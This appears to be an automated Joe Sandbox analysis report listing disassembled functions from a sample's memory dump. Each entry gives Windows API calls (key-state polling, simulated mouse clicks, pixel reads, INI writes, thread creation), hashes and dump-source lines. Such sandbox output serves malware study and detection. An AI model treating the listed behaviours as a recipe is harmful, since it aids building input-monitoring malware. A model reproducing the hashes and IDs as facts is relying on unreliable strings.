                                                                                                                                                        • Opcode ID: fca8b5f311ae7cf9e032c91f7cff4f091652f54ab9d391426ffcb932da758b4b
                                                                                                                                                        • Instruction ID: 43f24b38afcab436310d3d00463680a4c791cf41982dc2f35e2324ace1b40375
                                                                                                                                                        • Opcode Fuzzy Hash: fca8b5f311ae7cf9e032c91f7cff4f091652f54ab9d391426ffcb932da758b4b
                                                                                                                                                        • Instruction Fuzzy Hash: 6341D23990020DBBD720DBA9CE49FF9BBB9EB09330F154265FA19A72D1C7709D01D650
                                                                                                                                                        Function 00AE1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AE17D4
                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AE17FD
                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AE183C
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AE1861
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AE1869
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1389676194-0
                                                                                                                                                        • Opcode ID: 657d1214cc05b4f5a96be43f8b59f55c382b5687922582d18bc274ab9f9b7e98
                                                                                                                                                        • Instruction ID: 443dac4123efd31c8f7f7c2913f755133fc330d45e66e1bcf213cdade32c2a02
                                                                                                                                                        • Opcode Fuzzy Hash: 657d1214cc05b4f5a96be43f8b59f55c382b5687922582d18bc274ab9f9b7e98
                                                                                                                                                        • Instruction Fuzzy Hash: 7941F835A00215DFCF11EF65CA81AADBBF5EF49310B148099E806AB361DB35ED51DFA0
                                                                                                                                                        Function 00AAB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCursorPos.USER32(000000FF), ref: 00AAB749
                                                                                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                                        • Opcode ID: 6a8ef2b80d81ce0279cb39571020e761a494c3567572d7587068071e274fdc69
                                                                                                                                                        • Instruction ID: 45e7473df15449f2da8b71b90aa570f9719de90d557bec96913c791a10ea8baa
                                                                                                                                                        • Opcode Fuzzy Hash: 6a8ef2b80d81ce0279cb39571020e761a494c3567572d7587068071e274fdc69
                                                                                                                                                        • Instruction Fuzzy Hash: E1415E35505119FFDF159F64C884AEABBB4FB46360F10425AF829932D1CB74AD90DFA0
                                                                                                                                                        Function 00ACC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00ACC156
                                                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00ACC200
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ACC208
                                                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00ACC216
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ACC21E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                        • Opcode ID: 937c3834dff686d56dbc03cfa11a58a4b2848f47d57ffe9678120b95b40497dc
                                                                                                                                                        • Instruction ID: 806855554ea59d892c0ce06efa2e3652ede63c77901c6b4fa493a17267d12adb
                                                                                                                                                        • Opcode Fuzzy Hash: 937c3834dff686d56dbc03cfa11a58a4b2848f47d57ffe9678120b95b40497dc
                                                                                                                                                        • Instruction Fuzzy Hash: 5031CE71500219EBDB04CFA8DE4CBDE3BB5EB04325F118228F928AB1D1C7B09A14CB90
                                                                                                                                                        Function 00ACE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00ACE9CD
                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ACE9EA
                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ACEA22
                                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ACEA48
                                                                                                                                                        • _wcsstr.LIBCMT ref: 00ACEA52
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3902887630-0
                                                                                                                                                        • Opcode ID: a2bf4cc345a8384e7b29cb8e57865bdd2206838e3c63b5d9768e35b4a0db177b
                                                                                                                                                        • Instruction ID: db8a21f390a13c68a0d04ab6db08e0512e0b06b1d4441369062e535f075b2532
                                                                                                                                                        • Opcode Fuzzy Hash: a2bf4cc345a8384e7b29cb8e57865bdd2206838e3c63b5d9768e35b4a0db177b
                                                                                                                                                        • Instruction Fuzzy Hash: 8F21D772204240BEEB15DB699D45FBBBBACEF45750F11812DF809CB092DE71DC409250
                                                                                                                                                        Function 00AFDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AFDCC0
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00AFDCE4
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AFDCFC
                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00AFDD24
                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00AE407D,00000000), ref: 00AFDD42
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                                        • Opcode ID: 0721df8b27a2eaaabd523adce03b032940857b2c28c16d8e02103fb60349bd66
                                                                                                                                                        • Instruction ID: 3d426e76ab2c2c1e8fb510395c468af2bc21715124ce90ff2df91a1ed2b48dad
                                                                                                                                                        • Opcode Fuzzy Hash: 0721df8b27a2eaaabd523adce03b032940857b2c28c16d8e02103fb60349bd66
                                                                                                                                                        • Instruction Fuzzy Hash: 8A21B371605219AFCB325FB99C48B793BA6FB46365F104B34FA26C72E0D7719811CB90
                                                                                                                                                        Function 00ACCA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ACCA86
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ACCAB8
                                                                                                                                                        • __itow.LIBCMT ref: 00ACCAD0
                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ACCAF6
                                                                                                                                                        • __itow.LIBCMT ref: 00ACCB07
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2983881199-0
                                                                                                                                                        • Opcode ID: 53667014ed28890739750fbf61e83da35ab83ea97280c18bc2d916ca4e0d063e
                                                                                                                                                        • Instruction ID: 8d4952f4e183c474f0a40c4c36dc122f3eaed9831522c296fc6dd4194e04d1d3
                                                                                                                                                        • Opcode Fuzzy Hash: 53667014ed28890739750fbf61e83da35ab83ea97280c18bc2d916ca4e0d063e
                                                                                                                                                        • Instruction Fuzzy Hash: 6521D876B002047BDF21EBA89D4BFDE7AA9EF49760F114029F909E7192DA70CD4587A0
                                                                                                                                                        Function 00AE89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00AE89CE
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00AE89E5
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00AE8A21
                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00AE8A2D
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00AE8A68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                        • Opcode ID: 1410c3bed3df4623ac5df55e9e8503396b1ee26a05e15846b3a3ca8a70b334bf
                                                                                                                                                        • Instruction ID: 855c8586ec069eec5011e3e1e49097ea06206c75c62600f3c09b6e382fc50390
                                                                                                                                                        • Opcode Fuzzy Hash: 1410c3bed3df4623ac5df55e9e8503396b1ee26a05e15846b3a3ca8a70b334bf
                                                                                                                                                        • Instruction Fuzzy Hash: BA219375A00200AFDB10EFA5CD85AAA7BF5EF48301F05C479E94A97352CF74AD00CB60
                                                                                                                                                        Function 00AAB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                                                                                                                                                        • BeginPath.GDI32(?), ref: 00AAB611
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AAB63B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                                        • Opcode ID: 15ca953ab62a30e89c8e962124adbf0af3c0e007e2e64ce65b024370c078fbd9
                                                                                                                                                        • Instruction ID: 37035f886120e5db932406d4d8b3f2c2498c3a506e2b4e9dc2615896068ec63d
                                                                                                                                                        • Opcode Fuzzy Hash: 15ca953ab62a30e89c8e962124adbf0af3c0e007e2e64ce65b024370c078fbd9
                                                                                                                                                        • Instruction Fuzzy Hash: 5221AE70810305EFDB209F19ED487A97BF8FB0232AF544AAAF411A71E1DB709891CB70
                                                                                                                                                        Function 00AB2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00AB2E81
                                                                                                                                                        • CreateThread.KERNEL32(?,?,00AB2FB7,00000000,?,?), ref: 00AB2EC5
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00AB2ECF
                                                                                                                                                        • _free.LIBCMT ref: 00AB2ED8
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00AB2EE3
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2664167353-0
                                                                                                                                                        • Opcode ID: 0ccb31c424442518a111d5c5734e1d4c78e22f3c81fed9ed92afc33144bcffdc
                                                                                                                                                        • Instruction ID: e26be04623d70c64b4b069a581342a99b0592c9085ea2fca30b6748ad669d3ab
                                                                                                                                                        • Opcode Fuzzy Hash: 0ccb31c424442518a111d5c5734e1d4c78e22f3c81fed9ed92afc33144bcffdc
                                                                                                                                                        • Instruction Fuzzy Hash: F811A5321047056F9710BFAA9D41EEB7BACEF45760B10052AF91486153DF75C8108760
                                                                                                                                                        Function 00ACB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                                                                                                                                                        • GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00ACB3CB), ref: 00ACB923
                                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 883493501-0
                                                                                                                                                        • Opcode ID: 3cafab21b492c0576ce466b89d9fcb5f5911ceb293f07ef5cd0df20e82db00bd
                                                                                                                                                        • Instruction ID: 7260b4113752d9fc30ac54990b7b8f02ad0bc6f42d2e3363f1f57143a0dda5ed
                                                                                                                                                        • Opcode Fuzzy Hash: 3cafab21b492c0576ce466b89d9fcb5f5911ceb293f07ef5cd0df20e82db00bd
                                                                                                                                                        • Instruction Fuzzy Hash: A1016971211208BFDB114FA5DC89EAB3BADEF8A764B504429F945D3260DF768C50DEB0
